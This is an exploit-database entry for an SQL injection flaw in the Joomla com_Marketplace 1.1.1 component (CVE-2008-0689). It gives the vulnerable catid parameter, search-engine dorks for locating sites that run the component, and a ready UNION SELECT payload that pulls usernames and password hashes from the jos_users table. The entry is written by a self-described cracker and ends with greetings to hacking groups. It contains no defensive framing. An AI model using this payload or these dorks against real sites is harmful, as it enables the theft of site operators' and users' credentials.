Joomla! Component com_Marketplace 1.1.1 - SQL Injection

Author: SoSo H H
type: webapps
platform: php
port: 
date_added: 2008-02-02  
date_updated: 2016-10-27  
verified: 1  
codes: OSVDB-41512;CVE-2008-0689  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5055.txt  

############################################################################
# Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit            #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Tested on: Markplace Version 1.1.1 and 1.1.1-pl1                         #
#                                                                          #
# Dork:"Marketplace Version 1.1.1"                                         #
#      "Marketplace Version 1.1.1-pl1"                                     #
#      inurl:index.php?option=com_marketplace                        	   #
############################################################################
# Exploit in:                                                              #
# index.php?option=com_marketplace&page=show_category&catid=(SQL)          #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team                #
# and All 7shasha Boards Members!                                          #
############################################################################

# milw0rm.com [2008-02-03]